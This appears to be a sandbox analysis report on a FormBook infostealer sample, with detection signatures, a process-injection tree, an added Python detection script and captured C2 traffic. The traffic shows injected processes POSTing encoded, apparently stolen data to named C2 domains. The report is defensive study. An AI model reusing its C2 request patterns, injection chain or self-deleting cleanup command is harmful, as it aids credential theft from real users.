Analysis Report vSCyL8NNIC.exe

Overview

General Information

Sample Name: vSCyL8NNIC.exe
Analysis ID: 285610
MD5: 96f6deb36c8406eccfccc7bd38267c0e
SHA1: fb149c90507adb9461e54df9824407e5449460ec
SHA256: 52a3e59905cc8e33bc33223e1b55482b484c6e04d7795a7329946a77502e950d

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected FormBook malware
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Binary contains a suspicious time stamp
Creates an undocumented autostart registry key
Injects a PE file into a foreign process
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Startup

  • System is w10x64
  • vSCyL8NNIC.exe (PID: 7084 cmdline: 'C:\Users\user\Desktop\vSCyL8NNIC.exe' MD5: 96F6DEB36C8406ECCFCCC7BD38267C0E)
    • RegSvcs.exe (PID: 7124 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
      • explorer.exe (PID: 3376 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autofmt.exe (PID: 6112 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: 7FC345F685C2A58283872D851316ACC4)
        • chkdsk.exe (PID: 6492 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: 2D5A2497CB57C374B3AE3080FF9186FB)
          • cmd.exe (PID: 6792 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
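The tree above is the chain the signatures describe: the sample starts RegSvcs.exe (a .NET Framework utility, launched with no arguments) and hollows it; the hollowed RegSvcs.exe injects into explorer.exe; explorer.exe then starts SysWOW64 utilities (autofmt.exe, chkdsk.exe), and chkdsk.exe, whose memory later holds the C2 URLs, runs cmd.exe /c del against the RegSvcs.exe path. The following is an added example, not part of the Joe Sandbox report, that encodes those three hops as process-creation rules and runs them over events constructed to mirror the tree (PIDs, images and command lines are the ones shown above; the sample's parent PID, the image paths of explorer.exe and cmd.exe, and the lists of hollowing hosts and system directories are assumptions of the example):

```python
"""Process-tree triage for the injection chain shown in the Startup section.

Added example, not part of the Joe Sandbox report. EVENTS is constructed to
mirror the Startup tree; the sample's parent PID, the image paths of
explorer.exe and cmd.exe, and the HOLLOW_HOSTS list are assumptions.
"""
import re
from typing import Dict, List, Tuple

# Signed Windows binaries commonly picked as hollowing hosts (assumed list).
HOLLOW_HOSTS = {"regsvcs.exe", "regasm.exe", "installutil.exe", "msbuild.exe"}
SYSTEM_DIRS = ("c:\\windows\\syswow64\\", "c:\\windows\\system32\\")
USER_DIRS = ("c:\\users\\",)

# Constructed process-creation events (one per process in the tree above).
EVENTS: List[Dict] = [
    {"pid": 7084, "ppid": 4040,  # parent PID assumed (not in the report)
     "image": r"C:\Users\user\Desktop\vSCyL8NNIC.exe",
     "cmdline": r"'C:\Users\user\Desktop\vSCyL8NNIC.exe'"},
    {"pid": 7124, "ppid": 7084,
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "cmdline": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"},
    {"pid": 3376, "ppid": 0,  # pre-existing desktop shell; image path assumed
     "image": r"C:\Windows\explorer.exe", "cmdline": ""},
    {"pid": 6112, "ppid": 3376,
     "image": r"C:\Windows\SysWOW64\autofmt.exe",
     "cmdline": r"C:\Windows\SysWOW64\autofmt.exe"},
    {"pid": 6492, "ppid": 3376,
     "image": r"C:\Windows\SysWOW64\chkdsk.exe",
     "cmdline": r"C:\Windows\SysWOW64\chkdsk.exe"},
    {"pid": 6792, "ppid": 6492,  # cmd.exe image path assumed
     "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r"cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'"},
    {"pid": 6780, "ppid": 6792,
     "image": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
]

# "/c del <path>" with the path optionally wrapped in single or double quotes.
DEL_RE = re.compile(r"""/c\s+del\s+["']?(.+?)["']?\s*$""", re.IGNORECASE)

CHAIN_RULES = {"hollow_host_no_args", "shell_spawns_idle_system_utility",
               "cmd_deletes_tree_image"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def has_arguments(cmdline: str, image: str) -> bool:
    """True when the command line carries anything beyond the image path itself."""
    stripped = cmdline.strip().strip("'\"").lower()
    return stripped not in ("", image.lower())


def triage(events: List[Dict]) -> List[Tuple[str, int]]:
    """Return (rule, pid) findings for the three hops of the chain."""
    by_pid = {e["pid"]: e for e in events}
    tree_images = {basename(e["image"]) for e in events}
    findings: List[Tuple[str, int]] = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        name = basename(e["image"])
        parent_image = parent["image"].lower() if parent else ""
        # Hop 1: a known hollowing host started argument-less by a binary that
        # lives under a user-writable directory (RegSvcs.exe normally takes an
        # assembly path, so an empty command line is itself abnormal).
        if (name in HOLLOW_HOSTS and parent_image.startswith(USER_DIRS)
                and not has_arguments(e["cmdline"], e["image"])):
            findings.append(("hollow_host_no_args", e["pid"]))
        # Hop 2: the desktop shell launching an argument-less system utility,
        # the host chosen for the next injection (autofmt.exe, chkdsk.exe here).
        if (basename(parent_image) == "explorer.exe"
                and e["image"].lower().startswith(SYSTEM_DIRS)
                and not has_arguments(e["cmdline"], e["image"])):
            findings.append(("shell_spawns_idle_system_utility", e["pid"]))
        # Hop 3: cmd.exe /c del aimed at the image of another process in the tree.
        match = DEL_RE.search(e["cmdline"]) if name == "cmd.exe" else None
        if match and basename(match.group(1)) in tree_images:
            findings.append(("cmd_deletes_tree_image", e["pid"]))
    return findings


def looks_like_injection_chain(findings: List[Tuple[str, int]]) -> bool:
    """All three hops present: treat the tree as one injection chain."""
    return CHAIN_RULES <= {rule for rule, _ in findings}


if __name__ == "__main__":
    found = triage(EVENTS)
    for rule, pid in found:
        print(f"{rule:<34} pid={pid}")
    print("injection chain:", looks_like_injection_chain(found))
```

Each hop is weak on its own (an administrator can run chkdsk.exe from Explorer), which is why the final verdict requires all three rules to fire; in an EDR the same logic would be keyed on the real parent relationships rather than the sandbox's injection-based tree, which is why explorer.exe is modelled here as a pre-existing process rather than as a child of RegSvcs.exe.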

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: vSCyL8NNIC.exe | Virustotal: Detection: 23%
Source: vSCyL8NNIC.exe | ReversingLabs: Detection: 22%
Machine Learning detection for sample
Source: vSCyL8NNIC.exe | Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 1.2.RegSvcs.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then pop edi | 1_2_00416BC5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then pop edi | 1_2_00416C40

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.4:49738
Source: global traffic | HTTP traffic detected: GET /5gb/?0B=LZxP&jJEXPjV=wkiRR1Aw+Nr4Qs3rRkg1xbSjrbPlsIXn1FpdqrR7N9kZqsYnB2egJP22LrAYllq2dgSl HTTP/1.1 | Host: www.nationbuolder.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /5gb/?jJEXPjV=VSxJHqYOiiT/QfeO16tpc+XSptzmGTZDDQA2CuabIISuT1EE8M4dKQacUbfINdmsiM57&0B=LZxP HTTP/1.1 | Host: www.finanzasadilia.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /5gb/?0B=LZxP&jJEXPjV=okNRSiupe8c8QAdYgh0f+o4aR61IgfaHtn4dWuciZgJWAwn99zimG+/MTmPPo01PSLkg HTTP/1.1 | Host: www.thestupidquestion.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 34.102.136.180 34.102.136.180
Source: Joe Sandbox View | ASN Name: GOOGLE-2US GOOGLE-2US
Source: Joe Sandbox View | ASN Name: GOOGLEUS GOOGLEUS
Source: global trafficHTTP traffic detected: POST /5gb/ HTTP/1.1Host: www.finanzasadilia.comConnection: closeContent-Length: 413Cache-Control: no-cacheOrigin: http://www.finanzasadilia.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.finanzasadilia.com/5gb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6a 4a 45 58 50 6a 56 3d 64 77 39 7a 5a 4e 51 67 28 53 6a 75 45 5f 7a 35 69 5f 49 6c 4e 4c 7a 4c 67 49 48 70 42 6e 6c 43 66 45 42 7a 62 4a 54 43 47 4c 43 34 56 6e 49 61 31 38 46 37 49 58 76 63 4d 2d 66 6f 61 65 75 44 67 4c 49 32 45 30 48 5a 65 4b 61 57 4e 5a 38 70 52 38 28 4f 78 66 45 56 57 4d 4d 71 54 41 56 71 65 61 46 4e 4c 70 30 68 59 76 33 45 77 44 44 76 75 33 73 55 39 62 76 45 57 77 6a 5f 4e 34 4a 4c 47 6e 6a 56 56 65 77 31 73 4a 6e 57 78 78 4c 39 70 45 56 33 6a 66 45 4e 28 39 4f 4f 37 6b 36 34 6c 64 6a 43 4c 49 56 63 53 79 50 47 34 42 4e 59 74 69 79 6d 41 52 58 59 67 79 30 79 71 74 51 52 39 39 75 46 35 39 62 56 71 62 64 76 6a 4d 71 63 28 69 74 74 73 55 75 35 31 74 47 36 58 59 6d 52 33 66 74 33 4b 6e 4e 5f 4b 77 6f 58 49 30 28 59 71 76 44 78 43 44 53 4f 74 4e 38 6b 45 6b 45 47 54 4e 69 48 53 69 48 6c 7a 65 44 57 48 76 37 4a 74 43 28 6e 63 6c 74 78 59 4f 50 69 28 65 70 34 58 36 48 4d 6d 73 4c 31 51 50 31 49 68 2d 65 77 4c 32 6c 54 4c 41 49 36 5a 61 4d 77 32 75 75 6e 4f 6c 44 58 56 41 6d 78 5a 31 30 7a 48 36 66 57 32 67 45 6a 36 43 7e 33 6d 30 4b 4e 61 63 67 44 36 72 6d 7a 55 46 6f 66 7a 48 48 4c 4d 77 46 7a 44 72 4a 74 7e 54 79 39 43 74 41 44 38 31 42 66 6b 6e 53 74 33 35 39 77 41 76 33 42 6e 38 4b 4b 28 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
jJEXPjV=dw9zZNQg(SjuE_z5i_IlNLzLgIHpBnlCfEBzbJTCGLC4VnIa18F7IXvcM-foaeuDgLI2E0HZeKaWNZ8pR8(OxfEVWMMqTAVqeaFNLp0hYv3EwDDvu3sU9bvEWwj_N4JLGnjVVew1sJnWxxL9pEV3jfEN(9OO7k64ldjCLIVcSyPG4BNYtiymARXYgy0yqtQR99uF59bVqbdvjMqc(ittsUu51tG6XYmR3ft3KnN_KwoXI0(YqvDxCDSOtN8kEkEGTNiHSiHlzeDWHv7JtC(ncltxYOPi(ep4X6HMmsL1QP1Ih-ewL2lTLAI6ZaMw2uunOlDXVAmxZ10zH6fW2gEj6C~3m0KNacgD6rmzUFofzHHLMwFzDrJt~Ty9CtAD81BfknSt359wAv3Bn8KK(w).
Source: global trafficHTTP traffic detected: POST /5gb/ HTTP/1.1Host: www.finanzasadilia.comConnection: closeContent-Length: 185505Cache-Control: no-cacheOrigin: http://www.finanzasadilia.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.finanzasadilia.com/5gb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6a 4a 45 58 50 6a 56 3d 64 77 39 7a 5a 4d 6f 65 73 53 6e 5f 50 73 48 34 6a 76 59 54 48 59 37 6a 71 76 32 7a 52 41 4a 57 57 32 56 34 62 4a 43 71 50 71 53 4d 53 45 41 61 7a 2d 39 38 47 58 76 62 4f 2d 66 72 51 2d 53 56 70 39 4d 75 45 31 7a 6a 65 4b 53 56 47 38 77 77 66 4d 28 6a 77 5f 5a 75 48 59 6c 75 54 44 68 50 51 59 70 76 65 5a 34 68 57 5f 76 38 30 69 54 4f 6d 56 59 4c 7e 71 44 4c 51 78 4c 63 4b 50 35 7a 47 42 71 77 64 5f 74 54 37 4c 37 64 30 31 50 56 74 57 31 38 74 75 68 46 36 39 72 45 30 6e 75 38 6b 65 37 73 58 35 56 64 4e 52 28 45 6f 53 6c 71 6d 7a 32 31 46 42 6d 68 67 30 31 50 75 62 6f 4d 73 75 71 64 28 4e 37 37 7e 65 39 2d 39 4c 58 5a 6f 33 35 63 71 56 65 57 70 64 33 38 42 5a 4b 68 30 62 63 36 4f 46 39 45 4d 43 41 54 41 6c 50 73 36 6f 54 50 4f 67 4b 68 67 75 64 38 64 6b 6b 4f 48 76 76 6b 50 53 47 7a 31 65 44 53 53 50 37 78 37 44 75 6c 64 52 51 54 59 50 47 36 6c 66 56 35 48 6f 7a 4d 72 70 57 4c 66 66 46 45 70 75 50 48 61 48 68 45 59 54 55 7a 61 61 4d 6f 32 6f 36 38 4f 6c 44 62 56 46 4b 50 59 48 49 7a 47 72 28 5f 69 6e 77 6e 79 69 7e 51 67 31 6d 54 56 4d 63 54 36 76 4b 7a 56 77 4d 35 78 77 62 4c 4a 69 78 30 44 4b 4a 74 7a 44 79 39 4a 4e 42 77 39 6c 73 32 69 53 33 42 7e 34 78 65 42 4a 53 65 6a 4d 6d 48 69 6f 4a 54 4a 63 72 4f 6d 51 4c 4b 4c 6b 37 34 35 78 4d 56 68 6c 77 48 62 76 6b 39 58 54 46 4d 4c 66 64 2d 4a 47 69 41 37 36 55 44 6a 4b 55 63 61 5a 59 62 70 54 5a 63 33 79 6d 68 73 6a 5a 6a 4a 72 6a 4c 64 41 72 47 77 4a 4e 61 30 33 5a 6e 34 73 69 64 31 73 6c 48 31 78 52 4d 6a 43 65 6b 6e 4e 5a 35 53 4c 72 62 28 4a 36 42 51 47 6b 65 
5a 62 68 6f 46 58 62 6c 63 5a 4d 45 6e 75 58 73 33 48 32 54 39 62 35 4e 6d 71 33 79 77 54 66 54 35 38 34 48 6c 45 4d 55 39 42 69 6b 63 79 74 49 75 39 4f 55 58 65 7e 4e 31 73 38 31 72 2d 59 46 4a 6f 76 4e 6e 53 77 59 46 71 6e 36 52 69 58 62 68 73 53 39 69 78 68 51 5a 72 36 41 6c 57 7e 53 6c 74 38 47 6f 62 7e 64 6a 73 77 74 53 2d 54 78 42 6a 55 66 74 6b 47 41 71 64 71 33 72 47 38 5f 50 72 51 61 39 62 73 75 79 37 59 57 44 32 65 32 34 5a 65 6a 47 65 31 68 4a 35 73 47 42 43 6c 39 34 51 68 4a 55 35 73 59 36 6a 70 52 44 41 4a 4f 30 51 78 43 71 41 73 43 49 59 61 51 58 57 54 46 4b 5a 6c 31 61 34 31 78 68 74 35 38 6f 49 64 52 56 4f 74 4f 72 70 4a 4c 74 34 4c 58 39 57 67 6e 61 6d 72 4e 42 54 42 48 6d 71 72 37 34 79 65 63 4d 6b 4d 47 39 6d 61 4c 54 4f 65 38 42 43 7a 6d 31 4d 54 64 6e 6c 5a 6e 4e 63 44 49 78 6f 42 6e 72 5f 42 70 76 31 35 58 38 73 42 63 78 31 5a 37 54 4b 4e 50 79 53 32 5f 59 2d 54 6f 6e 61 67 6c 51 69 4f 53 57 44 47 78 73 68 55 2d 6c 32 48 52 44 42 4b 55 46 57 73 77 34 72 53 33 6f 66 5a 35 30 71 37 46 7
Source: global trafficHTTP traffic detected: POST /5gb/ HTTP/1.1Host: www.thestupidquestion.comConnection: closeContent-Length: 413Cache-Control: no-cacheOrigin: http://www.thestupidquestion.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.thestupidquestion.com/5gb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6a 4a 45 58 50 6a 56 3d 67 47 42 72 4d 43 65 37 66 64 4d 2d 4a 48 55 51 36 42 31 6b 75 4e 63 65 59 4b 74 55 6c 2d 32 51 37 33 64 76 4e 4f 59 5f 58 45 6f 54 42 69 7e 6b 76 51 69 5f 49 4c 79 4d 4a 6b 28 47 71 46 78 43 63 34 4e 57 41 49 63 70 50 50 4c 6b 5a 34 33 52 73 35 59 74 7e 77 31 63 59 73 45 6f 43 57 78 32 78 45 7e 44 33 37 4d 5a 69 36 31 46 6a 34 51 74 35 6a 45 47 35 41 68 4a 44 4e 4a 30 47 6c 72 63 59 61 58 67 31 52 31 58 61 42 66 49 37 76 6e 34 73 67 49 4f 77 48 52 49 4c 49 78 6f 37 57 6d 4e 6a 6b 73 50 67 7a 63 50 37 69 6e 42 72 42 58 62 4e 70 70 32 74 75 31 6b 64 78 5a 38 30 49 4a 51 50 44 69 6f 51 43 64 72 66 6f 38 6c 70 6f 6c 33 36 69 4d 79 54 42 59 54 4f 51 32 65 51 4a 4b 70 6b 6e 33 66 44 61 78 75 49 5f 41 34 28 36 28 35 79 71 4a 52 33 49 47 52 64 48 76 52 56 31 74 37 55 61 42 39 37 77 78 30 4c 2d 56 76 39 75 31 31 66 79 50 75 61 65 49 70 73 4d 53 73 6c 71 63 4b 41 69 44 56 6a 58 6b 49 4b 54 78 36 4e 59 51 72 4a 6c 38 65 58 38 49 44 30 36 6f 5a 43 6d 4e 65 61 5f 52 4c 35 33 41 33 77 35 6d 5f 62 70 55 61 47 79 57 53 67 57 36 46 28 66 66 31 47 58 76 59 7a 6b 59 67 34 6d 54 4e 31 2d 7e 49 63 48 65 6a 44 4c 36 68 49 37 52 62 65 43 46 72 4a 68 6f 5f 54 6a 54 42 78 51 36 6a 51 55 53 44 4b 6a 43 31 4b 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
jJEXPjV=gGBrMCe7fdM-JHUQ6B1kuNceYKtUl-2Q73dvNOY_XEoTBi~kvQi_ILyMJk(GqFxCc4NWAIcpPPLkZ43Rs5Yt~w1cYsEoCWx2xE~D37MZi61Fj4Qt5jEG5AhJDNJ0GlrcYaXg1R1XaBfI7vn4sgIOwHRILIxo7WmNjksPgzcP7inBrBXbNpp2tu1kdxZ80IJQPDioQCdrfo8lpol36iMyTBYTOQ2eQJKpkn3fDaxuI_A4(6(5yqJR3IGRdHvRV1t7UaB97wx0L-Vv9u11fyPuaeIpsMSslqcKAiDVjXkIKTx6NYQrJl8eX8ID06oZCmNea_RL53A3w5m_bpUaGyWSgW6F(ff1GXvYzkYg4mTN1-~IcHejDL6hI7RbeCFrJho_TjTBxQ6jQUSDKjC1KQ).
Source: global trafficHTTP traffic detected: POST /5gb/ HTTP/1.1Host: www.thestupidquestion.comConnection: closeContent-Length: 185505Cache-Control: no-cacheOrigin: http://www.thestupidquestion.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.thestupidquestion.com/5gb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6a 4a 45 58 50 6a 56 3d 67 47 42 72 4d 48 36 42 64 74 49 72 4e 79 4d 52 31 78 46 53 38 2d 55 4d 53 70 70 4c 6d 75 4f 45 32 41 6c 5f 4e 50 49 6a 66 68 5a 55 53 78 32 6b 36 47 32 79 45 4c 79 4c 50 6b 28 42 39 31 74 2d 65 72 39 65 41 4a 5a 4f 50 50 44 6e 4f 76 47 36 74 70 59 45 7e 51 35 6b 4d 63 51 4a 43 51 34 55 79 67 61 62 38 72 41 5a 37 4f 68 4c 6d 5a 68 35 36 6d 6f 4a 78 51 39 41 42 4e 52 58 42 56 58 67 5a 38 66 43 38 31 74 5a 4e 52 6e 66 6e 66 58 41 72 78 4d 56 7e 32 68 50 45 76 77 31 6d 6e 37 45 6d 6c 73 70 38 69 63 49 31 32 7a 31 73 44 4f 6d 49 62 46 4c 72 5f 46 61 64 33 59 42 35 64 49 65 65 55 43 67 53 7a 52 46 58 35 34 6a 6d 37 39 5f 77 48 68 49 52 41 6f 38 47 30 6e 59 56 5a 75 38 6c 56 50 50 65 76 56 56 62 65 64 35 33 72 76 52 79 37 4e 5a 34 73 36 75 58 67 54 47 64 45 4e 6a 54 66 78 62 34 51 78 58 45 65 56 37 31 2d 31 4e 61 54 66 62 61 71 4e 5f 73 4c 4f 36 76 61 77 4a 42 6b 44 56 74 57 55 7a 4a 67 4a 32 59 35 41 54 65 57 51 6a 52 2d 56 39 6e 4b 6f 42 43 6b 6c 56 61 5f 51 79 35 79 73 4a 7e 6f 79 5f 42 59 30 4a 46 52 75 65 6f 32 36 49 7a 76 50 72 52 55 4c 49 7a 6b 41 67 37 33 6a 7a 30 4d 65 49 4e 6b 57 69 43 71 36 68 4c 4c 52 62 54 69 45 31 5a 79 52 61 48 7a 79 68 69 51 44 49 61 54 79 56 4d 68 43 5f 53 61 70 39 47 44 72 42 74 46 54 49 6a 6e 5a 70 54 78 77 38 30 78 56 44 62 45 79 6c 5a 37 5a 45 79 4f 33 4b 37 4d 7e 68 43 54 79 33 39 6e 46 57 4c 5a 52 4a 72 39 28 50 59 49 56 35 64 34 46 47 7e 4a 30 55 68 75 64 58 73 42 36 35 49 78 4b 47 32 53 4e 36 73 45 72 5a 45 5f 32 63 32 46 77 32 30 30 73 47 43 69 79 4e 6f 6c 6f 77 79 
30 66 46 59 65 7a 52 77 65 58 4e 61 65 76 62 4e 53 44 57 62 41 6a 6b 6c 34 37 51 54 30 63 53 70 73 28 4d 79 65 34 32 76 69 45 5f 4f 33 4c 32 6b 35 75 50 61 4a 6b 2d 37 6c 47 64 5a 42 75 36 35 35 7a 48 53 5a 5a 6a 67 53 4f 31 6c 68 48 58 72 54 31 4b 39 73 42 78 59 75 4a 72 48 2d 62 4e 69 38 77 6f 4b 49 71 6e 5a 34 69 78 7e 39 54 66 48 64 39 66 51 39 67 5a 42 58 47 34 44 6f 4d 76 32 70 64 4f 75 79 38 54 45 46 33 33 6f 6e 6a 6a 7e 66 38 52 4c 49 50 48 56 69 4b 48 6a 73 54 4e 41 55 67 43 6f 62 72 48 73 44 33 38 68 4a 58 54 56 69 51 5f 57 58 30 75 72 34 67 52 47 6c 48 75 35 49 6c 59 47 46 64 41 57 59 37 31 79 50 69 63 5a 6f 74 47 53 4d 48 49 6c 70 47 48 38 61 77 6e 46 36 35 52 49 76 61 46 42 79 68 6e 44 4d 54 5f 69 53 72 75 74 4c 41 74 74 79 46 69 47 41 71 79 48 68 46 4e 32 4e 76 69 76 4c 70 50 6f 61 61 53 65 74 72 45 74 5f 69 6c 4c 67 53 42 57 4d 66 36 55 6d 4b 4c 4a 71 65 64 28 73 44 6f 69 76 6f 74 6e 6e 71 5f 6b 54 57 39 55 47 53 39 4f 41 36 63 72 48 55 53 6b 51 4d 51 74 64 4c 37 38 6f 72 39 61 31 4a 67 36 6
Source: unknown | DNS traffic detected: queries for: www.nationbuolder.com
Source: unknownHTTP traffic detected: POST /5gb/ HTTP/1.1Host: www.finanzasadilia.comConnection: closeContent-Length: 413Cache-Control: no-cacheOrigin: http://www.finanzasadilia.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.finanzasadilia.com/5gb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6a 4a 45 58 50 6a 56 3d 64 77 39 7a 5a 4e 51 67 28 53 6a 75 45 5f 7a 35 69 5f 49 6c 4e 4c 7a 4c 67 49 48 70 42 6e 6c 43 66 45 42 7a 62 4a 54 43 47 4c 43 34 56 6e 49 61 31 38 46 37 49 58 76 63 4d 2d 66 6f 61 65 75 44 67 4c 49 32 45 30 48 5a 65 4b 61 57 4e 5a 38 70 52 38 28 4f 78 66 45 56 57 4d 4d 71 54 41 56 71 65 61 46 4e 4c 70 30 68 59 76 33 45 77 44 44 76 75 33 73 55 39 62 76 45 57 77 6a 5f 4e 34 4a 4c 47 6e 6a 56 56 65 77 31 73 4a 6e 57 78 78 4c 39 70 45 56 33 6a 66 45 4e 28 39 4f 4f 37 6b 36 34 6c 64 6a 43 4c 49 56 63 53 79 50 47 34 42 4e 59 74 69 79 6d 41 52 58 59 67 79 30 79 71 74 51 52 39 39 75 46 35 39 62 56 71 62 64 76 6a 4d 71 63 28 69 74 74 73 55 75 35 31 74 47 36 58 59 6d 52 33 66 74 33 4b 6e 4e 5f 4b 77 6f 58 49 30 28 59 71 76 44 78 43 44 53 4f 74 4e 38 6b 45 6b 45 47 54 4e 69 48 53 69 48 6c 7a 65 44 57 48 76 37 4a 74 43 28 6e 63 6c 74 78 59 4f 50 69 28 65 70 34 58 36 48 4d 6d 73 4c 31 51 50 31 49 68 2d 65 77 4c 32 6c 54 4c 41 49 36 5a 61 4d 77 32 75 75 6e 4f 6c 44 58 56 41 6d 78 5a 31 30 7a 48 36 66 57 32 67 45 6a 36 43 7e 33 6d 30 4b 4e 61 63 67 44 36 72 6d 7a 55 46 6f 66 7a 48 48 4c 4d 77 46 7a 44 72 4a 74 7e 54 79 39 43 74 41 44 38 31 42 66 6b 6e 53 74 33 35 39 77 41 76 33 42 6e 38 4b 4b 28 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
jJEXPjV=dw9zZNQg(SjuE_z5i_IlNLzLgIHpBnlCfEBzbJTCGLC4VnIa18F7IXvcM-foaeuDgLI2E0HZeKaWNZ8pR8(OxfEVWMMqTAVqeaFNLp0hYv3EwDDvu3sU9bvEWwj_N4JLGnjVVew1sJnWxxL9pEV3jfEN(9OO7k64ldjCLIVcSyPG4BNYtiymARXYgy0yqtQR99uF59bVqbdvjMqc(ittsUu51tG6XYmR3ft3KnN_KwoXI0(YqvDxCDSOtN8kEkEGTNiHSiHlzeDWHv7JtC(ncltxYOPi(ep4X6HMmsL1QP1Ih-ewL2lTLAI6ZaMw2uunOlDXVAmxZ10zH6fW2gEj6C~3m0KNacgD6rmzUFofzHHLMwFzDrJt~Ty9CtAD81BfknSt359wAv3Bn8KK(w).
Source: vSCyL8NNIC.exe, 00000000.00000002.221758269.0000000002DE1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: chkdsk.exe, 00000005.00000002.478812914.00000000063EF000.00000004.00000001.sdmp | String found in binary or memory: http://thestupidquestion.com/5gb/?0B=LZxP&jJEXPjV=okNRSiupe8c8QAdYgh0f
Source: chkdsk.exe, 00000005.00000002.478472567.0000000006079000.00000004.00000001.sdmp | String found in binary or memory: http://www.thestupidquestion.com
Source: chkdsk.exe, 00000005.00000002.478472567.0000000006079000.00000004.00000001.sdmp | String found in binary or memory: http://www.thestupidquestion.com/5gb/
Source: chkdsk.exe, 00000005.00000002.476043438.00000000054C0000.00000004.00000001.sdmp, chkdsk.exe, 00000005.00000003.362069165.00000000054BE000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: chkdsk.exe, 00000005.00000002.476043438.00000000054C0000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: chkdsk.exe, 00000005.00000003.362069165.00000000054BE000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld255
Source: chkdsk.exe, 00000005.00000003.362069165.00000000054BE000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2;
